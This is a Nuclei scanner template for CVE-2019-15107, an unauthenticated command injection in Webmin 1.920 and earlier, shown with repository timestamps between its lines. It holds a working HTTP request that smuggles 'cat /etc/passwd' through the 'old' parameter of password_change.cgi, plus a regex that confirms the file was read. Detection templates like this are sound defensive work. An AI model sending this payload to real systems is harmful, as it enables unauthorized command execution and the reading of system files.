nuclei-templates/cves/2019/CVE-2019-15107.yaml

32 lines
1017 B
YAML
Raw Normal View History

2021-01-02 04:59:06 +00:00
id: CVE-2019-15107
2020-09-25 12:30:58 +00:00
info:
2021-04-06 10:43:41 +00:00
name: Webmin <= 1.920 Unauthenticated Remote Command Execution
2020-09-25 12:30:58 +00:00
author: bp0lr
severity: critical
description: An issue was discovered in Webmin <=1.920. The 'old' parameter in password_change.cgi contains a command injection vulnerability.
reference: https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
tags: cve,cve2019,webmin,rce
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2019-15107
cwe-id: CWE-78
2020-09-25 12:30:58 +00:00
requests:
- raw: #
2020-09-25 12:30:58 +00:00
- |
POST /password_change.cgi HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: {{BaseURL}}
2020-09-25 12:30:58 +00:00
Content-Type: application/x-www-form-urlencoded
user=rootxx&pam=&old=test|cat /etc/passwd&new1=test2&new2=test2&expired=2
matchers-condition: and
matchers:
- type: regex
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"